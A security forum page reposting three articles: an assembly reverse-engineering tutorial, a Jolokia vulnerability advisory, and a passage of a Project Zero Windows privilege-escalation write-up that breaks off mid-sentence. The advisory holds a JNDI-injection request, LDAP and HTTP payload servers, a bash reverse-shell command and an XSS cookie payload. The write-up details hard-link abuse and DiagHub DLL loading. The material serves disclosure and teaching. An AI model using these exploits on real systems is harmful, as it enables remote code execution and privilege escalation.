-
Posts
18740 -
Joined
-
Last visited
-
Days Won
711
Everything posted by Nytro
-
Homepage Daniel A. Bloom Daniel Bloom is a young, self taught, entrepreneur and the Founder of Bloom Cyber Defense, LLC — http://bcdefense.com — Twitter: @bcdannyboy Apr 17 BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts) Reverse Engineering Throughout the reverse engineering learning process I have found myself wanting a straightforward guide for what to look for when browsing through assembly code. While I’m a big believer in reading source code and manuals for information, I fully understand the desire to have concise, easy to comprehend, information all in one place. This “BOLO: Reverse Engineering” series is exactly that! Throughout this article series I will be showing you things to Be On the Look Out for when reverse engineering code. Ideally, this article series will make it easier for beginner reverse engineers to get a grasp on many different concepts! Preface Throughout this article you will see screenshots of C++ code and assembly code along with some explanation as to what you’re seeing and why things look the way they look. Furthermore, This article series will not cover the basics of assembly, it will only present patterns and decompiled code so that you can get a general understanding of what to look for / how to interpret assembly code. Throughout this article we will cover: Variable Initiation Basic Output Mathematical Operations Functions Loops (For loop / While loop) Conditional Statements (IF Statement / Switch Statement) User Input please note: This tutorial was made with visual C++ in Microsoft Visual Studio 2015 (I know, outdated version). Some of the assembly code (i.e. user input with cin) will reflect that. Furthermore, I am using IDA Pro as my disassembler. Variable Initiation Variables are extremely important when programming, here we can see a few important variables: a string an int a boolean a char a double a float a char array Basic Variables Please note: In C++, ‘string’ is not a primitive variable but I thought it important to show you anyway. Now, lets take a look at the assembly: Initiating Variables Here we can see how IDA represents space allocation for variables. As you can see, we’re allocating space for each variable before we actually initialize them. Initializing Variables Once space is allocated, we move the values that we want to set each variable to into the space we allocated for said variable. Although the majority of the variables are initialized here, below you will see the C++ string initiation. C++ String Initiation As you can see, initiating a string requires a call to a built in function for initiation. Basic Output preface info: Throughout this section I will be talking about items pushed onto the stack and used as parameters for the printf function. The concept of function parameters will be explained in better detail later in this article. Although this tutorial was built in visual C++, I opted to use printf rather than cout for output. Basic Output Now, let’s take a look at the assembly: First, the string literal: String Literal Output As you can see, the string literal is pushed onto the stack to be called as a parameter for the printf function. Now, let’s take a look at one of the variable outputs: Variable Output As you can see, first the intvar variable is moved into the EAX register, which is then pushed onto the stack along with the “%i” string literal used to indicate integer output. These variables are then taken from the stack and used as parameters when calling the printf function. Mathematical Functions In this section, we’ll be going over the following mathematical functions: Addition Subtraction Multiplication Division Bitwise AND Bitwise OR Bitwise XOR Bitwise NOT Bitwise Right-Shift Bitwise Left-Shift Mathematical Functions Code Let’s break each function down into assembly: First, we set A to hex 0A, which represents decimal 10, and B to hex 0F, which represents decimal 15. Variable Setting We add by using the ‘add’ opcode: Addition We subtract using the ‘sub’ opcode: Subtraction We multiply using the ‘imul’ opcode: Multiplication We divide using the ‘idiv’ opcode. In this case, we also use the ‘cdq’ to double the size of EAX so that we can fit the output of the division operation. Division We perform the Bitwise AND using the ‘and’ opcode: Bitwise AND We perform the Bitwise OR using the ‘or’ opcode: Bitwise OR We perform the Bitwise XOR using the ‘xor’ opcode: Bitwise XOR We perform the Bitwise NOT using the ‘not’ opcode: Bitwise NOT We peform the Bitwise Right-Shift using the ‘sar’ opcode: Bitwise Right-Shift We perform the Bitwise Left-Shift using the ‘shl’ opcode: Bitwise Left-Shift Function Calls In this section, we’ll be looking at 3 different types of functions: a basic void function a function that returns an integer a function that takes in parameters Calling Functions First, let’s take a look at calling newfunc() and newfuncret() because neither of those actually take in any parameters. Calling Functions Without Parameters If we follow the call to the newfunc() function, we can see that all it really does is print out “Hello! I’m a new function!”: The newfunc() Function Code The newfunc() Function As you can see, this function does use the retn opcode but only to return back to the previous location (so that the program can continue after the function completes.) Now, let’s take a look at the newfuncret() function which generates a random integer using the C++ rand() function and then returns said integer. The newfuncret() Function Code The newfuncret() function First, space is allocated for the A variable. Then, the rand() function is called, which returns a value into the EAX register. Next, the EAX variable is moved into the A variable space, effectively setting A to the result of rand(). Finally, the A variable is moved into EAX so that the function can use it as a return value. Now that we have an understanding of how to call function and what it looks like when a function returns something, let’s talk about calling functions with parameters: First, let’s take another look at the call statement: Calling a Function with Parameters in C++ Calling a Function with Parameters Although strings in C++ require a call to a basic_string function, the concept of calling a function with parameters is the same regardless of data type. First ,you move the variable into a register, then you push the registers on the stack, then you call the function. Let’s take a look at the function’s code: The funcparams() Function Code The funcparams() Function All this function does is take in a string, an integer, and a character and print them out using printf. As you can see, first the 3 variables are allocated at the top of the function, then these variables are pushed onto the stack as parameters for the printf function. Easy Peasy. Loops Now that we have function calling, output, variables, and math down, let’s move on to flow control. First, we’ll start with a for loop: For Loop Code A graphical Overview of the For Loop Before we break down the assembly code into smaller sections, let’s take a look at the general layout. As you can see, when the for loop starts, it has 2 options; It can either go to the box on the right (green arrow) and return, or it can go to the box on the left (red arrow) and loop back to the start of the for loop. Detailed For Loop First, we check if we’ve hit the maximum value by comparing the i variable to the max variable. If the i variable is not greater than or equal to the max variable, we continue down to the left and print out the i variable then add 1 to i and continue back to the start of the loop. If the i variable is, in fact, greater than or equal to max, we simply exit the for loop and return. Now, let’s take a look at a while loop: While Loop Code While Loop In this loop, all we’re doing is generating a random number between 0 and 20. If the number is greater than 10, we exit the loop and print “I’m out!” otherwise, we continue to loop. In the assembly, the A variable is generated and set to 0 originally, then we initialize the loop by comparing A to the hex number 0A which represents decimal 10. If A is not greater than or equal to 10, we generate a new random number which is then set to A and we continue back to the comparison. If A is greater than or equal to 10, we break out of the loop, print out “I’m out” and then return. If Statements Next, we’ll be talking about if statements. First, let’s take a look at the code: IF Statement Code This function generates a random number between 0 and 20 and stores said number in the variable A. If A is greater than 15, the program will print out “greater than 15”. If A is less than 15 but greater than 10, the program will print out “less than 15, greater than 10”. This pattern will continue until A is less than 5, in which case the program will print out “less than 5”. Now, let’s take a look at the assembly graph: IF Statement Assembly Graph As you can see, the assembly is structured similarly to the actual code. This is because IF statements are simply “If X Then Y Else Z”. IF we look at the first set of arrows coming out of the top section, we can see a comparison between the A variable and hex 0F, which represents decimal 15. If A is greater than or equal to 15, the program will print out “greater than 15” and then return. Otherwise, the program will compare A to hex 0A which represents decimal 10. This pattern will continue until the program prints and returns. Switch Statements Switch statements are a lot like IF statements except in a Switch statement one variable or statement is compared to a number of ‘cases’ (or possible equivalences). Let’s take a look at our code: Switch Statement Code In this function, we set the variable A to equal a random number between 0 and 10. Then, we compare A to a number of cases using a Switch statement. If A is equal to any of the possible cases, the case number will be printed, and then the program will break out of the Switch statement and the function will return. Now, let’s take a look at the assembly graph: Switch Case Assembly Graph Unlike IF statements, switch statements do not follow the “If X Then Y Else Z” rule, instead, the program simply compares the conditional statement to the cases and only executes a case if said case is the conditional statement’s equivalent. Le’ts first take a look at the initial 2 boxes: The First 2 Graph Sections First, the program generates a random number and sets it to A. Then, the program initializes the switch statement by first setting a temporary variable (var_D0) to equal A, then ensuring that var_D0 meets at least one of the possible cases. If var_D0 needs to default, the program follows the green arrow down to the final return section (see below). Otherwise, the program initiates a switch jump to the equivalent case’s section: In the case that var_D0 (A) is equal to 5, the code will jump to the above case section, print out “5” and then jump to the return section. User Input In this section, we’ll cover user input using the C++ cin function. First, let’s look at the code: User Input Code In this function, we simply take in a string to the variable sentence using the C++ cin function and then we print out sentence through a printf statement. Le’ts break this down into assembly. First, the C++ cin part: C++ cin This code simply initializes the string sentence then calls the cin function and sets the input to the sentence variable. Let’s take a look at the cin call a bit closer: The C++ cin Function Upclose First, the program sets the contents of the sentence variable to EAX, then pushes EAX onto the stack to be used as a parameter for the cin function which is then called and has it’s output moved into ECX, which is then put on the stack for the printf statement: User Input printf Statement Thanks! Hopefully, this article gave you a decent understanding of how basic programming concepts are represented in assembly. Keep an eye out for the next part of this series, BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)! lea eax, [ebp+Reading] ; “Reading” push eax lea ecx, [ebp+For] ; “For” push ecx mov edx, [ebp+Thanks] ; “Thanks” push edx push offset _Format ; “%s %s %s” call j_printf Sursa: https://medium.com/@danielabloom/bolo-reverse-engineering-part-1-basic-programming-concepts-f88b233c63b7
-
- 1
-
-
Jolokia Vulnerabilities - RCE & XSS Wednesday, April 18, 2018 at 12:45PM Recently, during a client engagement, Gotham Digital Science found a couple of zero-day vulnerabilities in the Jolokia service. Jolokia is an open source product that provides an HTTP API interface for JMX (Java Management Extensions) technology. It contains an API we can use for calling MBeans registered on the server and read/write their properties. JMX technology is used for managing and monitoring devices, applications, and service-driven networks. The following issues are described below: Remote Code Execution via JNDI Injection – CVE-2018-1000130 Cross-Site Scripting – CVE-2018-1000129 Affected versions: 1.4.0 and below. Version 1.5.0 addresses both issues. Before we start, a little humour - if someone thinks that the documentation is useless for bug hunters, look at this: Remote Code Execution via JNDI Injection CVE-2018-1000130 The Jolokia service has a proxy mode that was vulnerable to JNDI injection by default before version 1.5.0. When the Jolokia agent is deployed in proxy mode, an external attacker, with access to the Jolokia web endpoint, can execute arbitrary code remotely via JNDI injection attack. This attack is possible since the Jolokia library initiates LDAP/RMI connections using user-supplied input. JNDI attacks were explained at the BlackHat USA 2016 conference by HP Enterprise folks, and they showed some useful vectors we can use to turn them into Remote Code Execution. If a third-party system uses Jolokia service in proxy mode, this system is exposed to remote code execution through the Jolokia endpoint. Jolokia, as a component, does not provide any authentication mechanisms for this endpoint to protect the server from an arbitrary attacker, but this is strongly recommended in the documentation. Steps to reproduce: For demonstration purposes we’ll run all of the components in the exploit chain on the loopback interface. The following POST request can be used to exploit this vulnerability: POST /jolokia/ HTTP/1.1 Host: localhost:10007 Content-Type: application/x-www-form-urlencoded Content-Length: 206 { "type" : "read", "mbean" : "java.lang:type=Memory", "target" : { "url" : "service:jmx:rmi:///jndi/ldap://localhost:9092/jmxrmi" } } view raw jolokia-proxy.http hosted with ❤ by GitHub We need to create LDAP and HTTP servers in order to serve a malicious payload. These code snippets were originally taken from marshalsec and zerothoughts GitHub repositories. public class LDAPRefServer { private static final String LDAP_BASE = "dc=example,dc=com"; public static void main ( String[] args ) { int port = 1389; // Create LDAP Server and HTTP Server if ( args.length < 1 || args[ 0 ].indexOf('#') < 0 ) { System.err.println(LDAPRefServer.class.getSimpleName() + " <codebase_url#classname> [<port>]"); System.exit(-1); } else if ( args.length > 1 ) { port = Integer.parseInt(args[ 1 ]); } try { InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE); config.setListenerConfigs(new InMemoryListenerConfig( "listen", InetAddress.getByName("0.0.0.0"), port, ServerSocketFactory.getDefault(), SocketFactory.getDefault(), (SSLSocketFactory) SSLSocketFactory.getDefault())); config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[ 0 ]))); InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); System.out.println("Listening on 0.0.0.0:" + port); ds.startListening(); System.out.println("Starting HTTP server"); HttpServer httpServer = HttpServer.create(new InetSocketAddress(7873), 0); httpServer.createContext("/",new HttpFileHandler()); httpServer.setExecutor(null); httpServer.start(); } catch ( Exception e ) { e.printStackTrace(); } } private static class OperationInterceptor extends InMemoryOperationInterceptor { private URL codebase; public OperationInterceptor ( URL cb ) { this.codebase = cb; } @Override public void processSearchResult ( InMemoryInterceptedSearchResult result ) { String base = result.getRequest().getBaseDN(); Entry e = new Entry(base); try { sendResult(result, base, e); } catch ( Exception e1 ) { e1.printStackTrace(); } } protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException { URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl); e.addAttribute("javaClassName", "ExportObject"); String cbstring = this.codebase.toString(); int refPos = cbstring.indexOf('#'); if ( refPos > 0 ) { cbstring = cbstring.substring(0, refPos); } System.out.println("javaCodeBase: " + cbstring); e.addAttribute("javaCodeBase", cbstring); e.addAttribute("objectClass", "javaNamingReference"); e.addAttribute("javaFactory", this.codebase.getRef()); result.sendSearchEntry(e); result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); } } } view raw LDAPRefServer.java hosted with ❤ by GitHub public class HttpFileHandler implements HttpHandler { public void handle(HttpExchange httpExchange) { try { System.out.println("new http request from " + httpExchange.getRemoteAddress() + " " + httpExchange.getRequestURI()); InputStream inputStream = HttpFileHandler.class.getResourceAsStream("ExportObject.class"); ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); while(inputStream.available()>0) { byteArrayOutputStream.write(inputStream.read()); } byte[] bytes = byteArrayOutputStream.toByteArray(); httpExchange.sendResponseHeaders(200, bytes.length); httpExchange.getResponseBody().write(bytes); httpExchange.close(); } catch(Exception e) { e.printStackTrace(); } } } view raw HttpFileHandler.java hosted with ❤ by GitHub After that we need to create an ExportObject.java with reverse shell command. The bytecode of this class will be served from our HTTP server: public class ExportObject { public ExportObject() { try { System.setSecurityManager(null); java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp/127.0.0.1/7777 0>&1`"); } catch(Exception e) { e.printStackTrace(); } } } view raw ExportObject.java hosted with ❤ by GitHub The LDAP Server should be run with the following command line arguments: http://127.0.0.1:7873/#ExportObject 9092 where: http://127.0.0.1:7873/ is the URL of the attacker’s HTTP server ExportObject is name of the Java class containing the attacker’s code 9092 is the LDAP server listen port Start an nc listener on port 7777: $ nc -lv 7777 After the reuqest shown in step #1 is sent, the vulnerable server makes request to the attacker’s LDAP server. When the LDAP server, listening on the port 9092, receives a request from the vulnerable server, it creates an Entry object with attributes and returns it in the LDAP response. e.addAttribute("javaClassName", "ExportObject"); e.addAttribute("javaCodeBase", "http://127.0.0.1/"); e.addAttribute("objectClass", "javaNamingReference"); e.addAttribute("javaFactory", "ExportObject"); When the vulnerable server receives the LDAP response, it fetches the ExportObject.class from the attacker’s HTTP server, instantiates the object and executes the reverse shell command. The attacker receives the connection back from the vulnerable server on his nc listener. Cross-Site Scripting CVE-2018-1000129 The Jolokia web application is vulnerable to a classic Reflected Cross-Site Scripting (XSS) attack. By default, Jolokia returns responses with application/json content type, so for most cases inserting user supplied input into the response is not a big problem. But it was discovered from reading the source code that it is possible to modify the Content-Type of a response just by adding a GET parameter mimeType to the request: http://localhost:8161/api/jolokia/read?mimeType=text/html After that, it was relatively easy to find at least one occurrence where URL parameters are inserted in the response ‘as is’: http://localhost:8161/api/jolokia/read<svg%20onload=alert(docu ment.cookie)>?mimeType=text/html With text/html Content Type, the classic reflected XSS attack is possible. Exploiting this issue allows an attacker to supply arbitrary client-side javascript code within application input parameters that will ultimately be rendered and executed within the end user’s web browser. This can be leveraged to steal cookies in the vulnerable domain and potentially gain unauthorised access to a user’s authenticated session, alter the content of the vulnerable web page, or compromise the user’s web browser. And at the end, advice for bug hunters – read documentation! Sometimes it’s useful! recommendation for Jolokia users - update the service to version 1.5.0. Credits Many thanks to Roland Huss from the Jolokia project for working diligently with GDS to mitigate these issues. Olga Barinova Sursa: https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
-
Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege Posted by James Forshaw, Project Zero Previously I presented a technique to exploit arbitrary directory creation vulnerabilities on Windows to give you read access to any file on the system. In the upcoming Spring Creators Update (RS4) the abuse of mount points to link to files as I exploited in the previous blog post has been remediated. This is an example of a long term security benefit from detailing how vulnerabilities might be exploited, giving a developer an incentive to find ways of mitigating the exploitation vector. Keeping with that spirit in this blog post I’ll introduce a novel technique to exploit the more common case of arbitrary file writes on Windows 10. Perhaps once again Microsoft might be able to harden the OS to make it more difficult to exploit these types of vulnerabilities. I’ll demonstrate exploitation by describing in detail the recently fixed issue that Project Zero reported to Microsoft (issue 1428). An arbitrary file write vulnerability is where a user can create or modify a file in a location they could not normally access. This might be due to a privileged service incorrectly sanitizing information passed by the user or due to a symbolic link planting attack where the user can write a link into a location which is subsequently used by the privileged service. The ideal vulnerability is one where the attacking user not only controls the location of the file being written but also the entire contents. This is the type of vulnerability we’ll consider in this blog post. A common way of exploiting arbitrary file writes is to perform DLL hijacking. When a Windows executable begins executing the initial loader in NTDLL will attempt to find all imported DLLs. The locations that the loader checks for imported DLLs are more complex than you’d expect but for our purposes can be summarized as follows: Check Known DLLs, which is a pre-cached list of DLLs which are known to the OS. If found, the DLL is mapped into memory from a pre-loaded section object. Check the application’s directory, for example if importing TEST.DLL and the application is in C:\APP then it will check C:\APP\TEST.DLL. Check the system locations, such as C:\WINDOWS\SYSTEM32 and C:\WINDOWS. If all else fails search the current environment PATH. The aim of the DLL hijack is to find an executable which runs at a high privilege which will load a DLL from a location that the vulnerability allows us to write to. The hijack only succeeds if the DLL hasn’t already been found in a location checked earlier. There are two problems which make DLL hijacking annoying: You typically need to create a new instance of a privileged process as the majority of DLL imports are resolved when the process is first executed. Most system binaries, executables and DLLs that will run as a privileged user will be installed into SYSTEM32. The second problem means that in steps 2 and 3 the loader will always look for DLLs in SYSTEM32. Assuming that overwriting a DLL isn’t likely to be an option (at the least if the DLL is already loaded you can’t write to the file), that makes it harder to find a suitable DLL to hijack. A typical way around these problems is to pick an executable that is not located in SYSTEM32 and which can be easily activated, such as by loading a COM server or running a scheduled task. Even if you find a suitable target executable to DLL hijack the implementation can be quite ugly. Sometimes you need to implement stub exports for the original DLL, otherwise the loading of the DLL will fail. In other cases the best place to run code is during DllMain, which introduces other problems such as running code inside the loader lock. What would be nice is a privileged service that will just load an arbitrary DLL for us, no hijacking, no needing to spawn the “correct” privileged process. The question is, does such a service exist? It turns out yes one does, and the service itself has been abused at least twice previously, once by Lokihardt for a sandbox escape, and once by me for user to system EoP. This service goes by the name “Microsoft (R) Diagnostics Hub Standard Collector Service,” but we’ll call it DiagHub for short. The DiagHub service was introduced in Windows 10, although there’s a service that performs a similar task called IE ETW Collector in Windows 7 and 8.1. The purpose of the service is to collect diagnostic information using Event Tracing for Windows (ETW) on behalf of sandboxed applications, specifically Edge and Internet Explorer. One of its interesting features is that it can be configured to load an arbitrary DLL from the SYSTEM32 directory, which is the exact feature that Lokihardt and I exploited to gain elevated privileges. All the functionality for the service is exposed over a registered DCOM object, so in order to load our DLL we’ll need to work out how to call methods on that DCOM object. At this point you can skip to the end but if you want to understand how I would go about finding how the DCOM object is implemented, the next section might be of interest. Reverse Engineering a DCOM Object Let’s go through the steps I would take to try and find what interfaces an unknown DCOM object supports and find the implementation so we can reverse engineer them. There are two approaches I will typically take, go straight for RE in IDA Pro or similar, or do some on-system inspection first to narrow down the areas we have to investigate. Here we’ll go for the second approach as it’s more informative. I can’t say how Lokihardt found his issue; I’m going to opt for magic. For this approach we’ll need some tools, specifically my OleViewDotNet v1.4+ (OVDN) tool from github as well as an installation of WinDBG from the SDK. The first step is to find the registration information for the DCOM object and discover what interfaces are accessible. We know that the DCOM object is hosted in a service so once you’ve loaded OVDN go to the menu Registry ⇒ Local Services and the tool will load a list of registered system services which expose COM objects. If you now find the “Microsoft (R) Diagnostics Hub Standard Collector Service” service (applying a filter here is helpful) you should find the entry in the list. If you open the service tree node you’ll see a child, “Diagnostics Hub Standard Collector Service,” which is the hosted DCOM object. If you open that tree node the tool will create the object, then query for all remotely accessible COM interfaces to give you a list of interfaces the object supports. I’ve shown this in the screenshot below: While we’re here it’s useful to inspect what security is required to access the DCOM object. If you right click the class treenode you can select View Access Permissions or View Launch Permissions and you’ll get a window that shows the permissions. In this case it shows that this DCOM object will be accessible from IE Protected Mode as well as Edge’s AppContainer sandbox, including LPAC. Of the list of interfaces shown we only really care about the standard interfaces. Sometimes there are interesting interfaces in the factory but in this case there aren’t. Of these standard interfaces there are two we care about, the IStandardCollectorAuthorizationService and IStandardCollectorService. Just to cheat slightly I already know that it’s the IStandardCollectorService service we’re interested in, but as the following process is going to be the same for each of the interfaces it doesn’t matter which one we pick first. If you right click the interface treenode and select Properties you can see a bit of information about the registered interface. There’s not much more information that will help us here, other than we can see there are 8 methods on this interface. As with a lot of COM registration information, this value might be missing or erroneous, but in this case we’ll assume it’s correct. To understand what the methods are we’ll need to track down the implementation of IStandardCollectorService inside the COM server. This knowledge will allow us to target our RE efforts to the correct binary and the correct methods. Doing this for an in-process COM object is relatively easy as we can query for an object’s VTable pointer directly by dereferencing a few pointers. However, for out-of-process it’s more involved. This is because the actual in-process object you’d call is really a proxy for the remote object, as shown in the following diagram: All is not lost, however; we can still find the the VTable of the OOP object by extracting the information stored about the object in the server process. Start by right clicking the “Diagnostics Hub Standard Collector Service” object tree node and select Create Instance. This will create a new instance of the COM object as shown below: The instance gives you basic information such as the CLSID for the object which we’ll need later (in this case {42CBFAA7-A4A7-47BB-B422-BD10E9D02700}) as well as the list of supported interfaces. Now we need to ensure we have a connection to the interface we’re interested in. For that select the IStandardCollectorService interface in the lower list, then in the Operations menu at the bottom select Marshal ⇒ View Properties. If successful you’ll now see the following new view: There’s a lot of information in this view but the two pieces of most interest are the Process ID of the hosting service and the Interface Pointer Identifier (IPID). In this case the Process ID should be obvious as the service is running in its own process, but this isn’t always the case—sometimes when you create a COM object you’ve no idea which process is actually hosting the COM server so this information is invaluable. The IPID is the unique identifier in the hosting process for the server end of the DCOM object; we can use the Process ID and the IPID in combination to find this server and from that find out the location of the actual VTable implementing the COM methods. It’s worth noting that the maximum Process ID size from the IPID is 16 bits; however, modern versions of Windows can have much larger PIDs so there’s a chance that you’ll have to find the process manually or restart the service multiple times until you get a suitable PID. Now we’ll use a feature of OVDN which allows us to reach into the memory of the server process and find the IPID information. You can access information about all processes through the main menu Object ⇒ Processes but as we know which process we’re interested in just click the View button next to the Process ID in the marshal view. You do need to be running OVDN as an administrator otherwise you’ll not be able to open the service process. If you’ve not done so already the tool will ask you to configure symbol support as OVDN needs public symbols to find the correct locations in the COM DLLs to parse. You’ll want to use the version of DBGHELP.DLL which comes with WinDBG as that supports remote symbol servers. Configure the symbols similar to the following dialog: If everything is correctly configured and you’re an administrator you should now see more details about the IPID, as shown below: The two most useful pieces of information here are the Interface pointer, which is the location of the heap allocated object (in case you want to inspect its state), and the VTable pointer for the interface. The VTable address gives us information for where exactly the COM server implementation is located. As we can see here the VTable is located in a different module (DiagnosticsHub.StandardCollector.Runtime) from the main executable (DiagnosticsHub.StandardCollector.Server). We can verify the VTable address is correct by attaching to the service process using WinDBG and dumping the symbols at the VTable address. We also know from before we’re expecting 8 methods so we can take that into account by using the command: dqs DiagnosticsHub_StandardCollector_Runtime+0x36C78 L8 Note that WinDBG converts periods in a module name to underscores. If successful you’ll see the something similar to the following screenshot: Extracting out that information we now get the name of the methods (shown below) as well as the address in the binary. We could set breakpoints and see what gets called during normal operation, or take this information and start the RE process. ATL::CComObject<StandardCollectorService>::QueryInterface ATL::CComObjectCached<StandardCollectorService>::AddRef ATL::CComObjectCached<StandardCollectorService>::Release StandardCollectorService::CreateSession StandardCollectorService::GetSession StandardCollectorService::DestroySession StandardCollectorService::DestroySessionAsync StandardCollectorService::AddLifetimeMonitorProcessIdForSession The list of methods looks correct: they start with the 3 standard methods for a COM object, which in this case are implemented by the ATL library. Following those methods are five implemented by the StandardCollectorService class. Being public symbols, this doesn’t tell us what parameters we expect to pass to the COM server. Due to C++ names containing some type information, IDA Pro might be able to extract that information for you, however that won’t necessarily tell you the format of any structures which might be passed to the function. Fortunately due to how COM proxies are implemented using the Network Data Representation (NDR) interpreter to perform marshalling, it’s possible to reverse the NDR bytecode back into a format we can understand. In this case go back to the original service information, right click the IStandardCollectorService treenode and select View Proxy Definition. This will get OVDN to parse the NDR proxy information and display a new view as shown below. Viewing the proxy definition will also parse out any other interfaces which that proxy library implements. This is likely to be useful for further RE work. The decompiled proxy definition is shown in a C# like pseudo code but it should be easy to convert into working C# or C++ as necessary. Notice that the proxy definition doesn’t contain the names of the methods but we’ve already extracted those out. So applying a bit of cleanup and the method names we get a definition which looks like the following: [uuid("0d8af6b7-efd5-4f6d-a834-314740ab8caa")] struct IStandardCollectorService : IUnknown { HRESULT CreateSession(_In_ struct Struct_24* p0, _In_ IStandardCollectorClientDelegate* p1, _Out_ ICollectionSession** p2); HRESULT GetSession(_In_ GUID* p0, _Out_ ICollectionSession** p1); HRESULT DestroySession(_In_ GUID* p0); HRESULT DestroySessionAsync(_In_ GUID* p0); HRESULT AddLifetimeMonitorProcessIdForSession(_In_ GUID* p0, [In] int p1); } There’s one last piece missing; we don’t know the definition of the Struct_24 structure. It’s possible to extract this from the RE process but fortunately in this case we don’t have to. The NDR bytecode must know how to marshal this structure across so OVDN just extracts the structure definition out for us automatically: select the Structures tab and find Struct_24. As you go through the RE process you can repeat this process as necessary until you understand how everything works. Now let’s get to actually exploiting the DiagHub service and demonstrating its use with a real world exploit. Example Exploit So after our efforts of reverse engineering, we’ll discover that in order to to load a DLL from SYSTEM32 we need to do the following steps: Create a new Diagnostics Session using IStandardCollectorService::CreateSession. Call the ICollectionSession::AddAgent method on the new session, passing the name of the DLL to load (without any path information). The simplified loading code for ICollectionSession::AddAgent is as follows: void EtwCollectionSession::AddAgent(LPWCSTR dll_path, REFGUID guid) { WCHAR valid_path[MAX_PATH]; if ( !GetValidAgentPath(dll_path, valid_path)) { return E_INVALID_AGENT_PATH; HMODULE mod = LoadLibraryExW(valid_path, nullptr, LOAD_WITH_ALTERED_SEARCH_PATH); dll_get_class_obj = GetProcAddress(hModule, "DllGetClassObject"); return dll_get_class_obj(guid); } We can see that it checks that the agent path is valid and returns a full path (this is where the previous EoP bugs existed, insufficient checks). This path is loading using LoadLibraryEx, then the DLL is queried for the exported method DllGetClassObject which is then called. Therefore to easily get code execution all we need is to implement that method and drop the file into SYSTEM32. The implemented DllGetClassObject will be called outside the loader lock so we can do anything we want. The following code (error handling removed) will be sufficient to load a DLL called dummy.dll. IStandardCollectorService* service; CoCreateInstance(CLSID_CollectorService, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&service)); SessionConfiguration config = {}; config.version = 1; config.monitor_pid = ::GetCurrentProcessId(); CoCreateGuid(&config.guid); config.path = ::SysAllocString(L"C:\Dummy"); ICollectionSession* session; service->CreateSession(&config, nullptr, &session); GUID agent_guid; CoCreateGuid(&agent_guid); session->AddAgent(L"dummy.dll", agent_guid); All we need now is the arbitrary file write so that we can drop a DLL into SYSTEM32, load it and elevate our privileges. For this I’ll demonstrate using a vulnerability I found in the SvcMoveFileInheritSecurity RPC method in the system Storage Service. This function caught my attention due to its use in an exploit for a vulnerability in ALPC discovered and presented by Clément Rouault & Thomas Imbert at PACSEC 2017. While this method was just a useful exploit primitive for the vulnerability I realized it has not one, but two actual vulnerabilities lurking in it (at least from a normal user privilege). The code prior to any fixes for SvcMoveFileInheritSecurity looked like the following: void SvcMoveFileInheritSecurity(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName, DWORD dwFlags) { PACL pAcl; if (!RpcImpersonateClient()) { // Move file while impersonating. if (MoveFileEx(lpExistingFileName, lpNewFileName, dwFlags)) { RpcRevertToSelf(); // Copy inherited DACL while not. InitializeAcl(&pAcl, 8, ACL_REVISION); DWORD status = SetNamedSecurityInfo(lpNewFileName, SE_FILE_OBJECT, UNPROTECTED_DACL_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION, nullptr, nullptr, &pAcl, nullptr); if (status != ERROR_SUCCESS) MoveFileEx(lpNewFileName, lpExistingFileName, dwFlags); } else { // Copy file instead... RpcRevertToSelf(); } } } The purpose of this method seems to be to move a file then apply any inherited ACE’s to the DACL from the new directory location. This would be necessary as when a file is moved on the same volume, the old filename is unlinked and the file is linked to the new location. However, the new file will maintain the security assigned from its original location. Inherited ACEs are only applied when a new file is created in a directory, or as in this case, the ACEs are explicitly applied by calling a function such as SetNamedSecurityInfo. To ensure this method doesn’t allow anyone to move an arbitrary file while running as the service’s user, which in this case is Local System, the RPC caller is impersonated. The trouble starts immediately after the first call to MoveFileEx, the impersonation is reverted and SetNamedSecurityInfo is called. If that call fails then the code calls MoveFileEx again to try and revert the original move operation. This is the first vulnerability; it’s possible that the original filename location now points somewhere else, such as through the abuse of symbolic links. It’s pretty easy to cause SetNamedSecurityInfo to fail, just add a Deny ACL for Local System to the file’s ACE for WRITE_DAC and it’ll return an error which causes the revert and you get an arbitrary file creation. This was reported as issue 1427. This is not in fact the vulnerability we’ll be exploiting, as that would be too easy. Instead we’ll exploit a second vulnerability in the same code: the fact that we can get the service to call SetNamedSecurityInfo on any file we like while running as Local System. This can be achieved either by abusing the impersonated device map to redirect the local drive letter (such as C:) when doing the initial MoveFileEx, which then results in lpNewFileName pointing to an arbitrary location, or more interestingly abusing hard links. This was reported as issue 1428. We can exploit this using hard links as follows: Create a hard link to a target file in SYSTEM32 that we want to overwrite. We can do this as you don’t need to have write privileges to a file to create a hard link to it, at least outside of a sandbox. Create a new directory location that has an inheritable ACE for a group such as Everyone or Authenticated Users to allow for modification of any new file. You don’t even typically need to do this explicitly; for example, any new directory created in the root of the C: drive has an inherited ACE for Authenticated Users. Then a request can be made to the RPC service to move the hardlinked file to the new directory location. The move succeeds under impersonation as long as we have FILE_DELETE_CHILD access to the original location and FILE_ADD_FILE in the new location, which we can arrange. The service will now call SetNamedSecurityInfo on the moved hardlink file. SetNamedSecurityInfo will pick up the inherited ACEs from the new directory location and apply them to the hardlinked file. The reason the ACEs are applied to the hardlinked file is from the perspective of SetNamedSecurityInfo the hardlinked file is in the new location, even though the original target file we linked to was in SYSTEM32. By exploiting this we can modify the security of any file that Local System can access for WRITE_DAC access. Therefore we can modify a file in SYSTEM32, then use the DiagHub service to load it. There is a slight problem, however. The majority of files in SYSTEM32 are actually owned by the TrustedInstaller group and so cannot be modified, even by Local System. We need to find a file we can write to which isn’t owned by TrustedInstaller. Also we’d want to pick a file that won’t cause the OS install to become corrupt. We don’t care about the file’s extension as AddAgent only checks that the file exists and loads it with LoadLibraryEx. There are a number of ways we can find a suitable file, such as using the SysInternals 